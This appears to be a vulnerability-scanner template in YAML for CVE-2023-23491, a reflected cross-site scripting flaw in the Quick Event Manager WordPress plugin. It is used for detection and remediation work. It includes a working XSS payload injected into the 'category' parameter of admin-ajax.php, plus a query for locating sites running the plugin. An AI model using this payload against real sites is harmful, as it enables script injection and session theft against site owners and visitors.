34 lines
1.2 KiB
YAML
34 lines
1.2 KiB
YAML
|
id: CVE-2023-23491
|
||
|
|
||
|
info:
|
||
|
name: Quick Event Manager < 9.7.5 - Cross-Site Scripting
|
||
|
author: ritikchaddha
|
||
|
severity: medium
|
||
|
description: |
|
||
|
The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.
|
||
|
remediation: Fixed in version 9.7.5 and above
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/49178a9d-0500-4e3e-8ea1-6cd4eeda2a4e
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-23491
|
||
|
classification:
|
||
|
cve-id: CVE-2023-23491
|
||
|
metadata:
|
||
|
max-request: 1
|
||
|
verified: true
|
||
|
publicwww-query: "/wp-content/plugins/quick-event-manager"
|
||
|
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager
|
||
|
|
||
|
http:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=</script><script>alert(document.domain)</script>"
|
||
|
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'status_code == 200'
|
||
|
- 'contains(all_headers, "text/html")'
|
||
|
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||
|
- 'contains(body, "qem_calendar")'
|
||
|
condition: and
|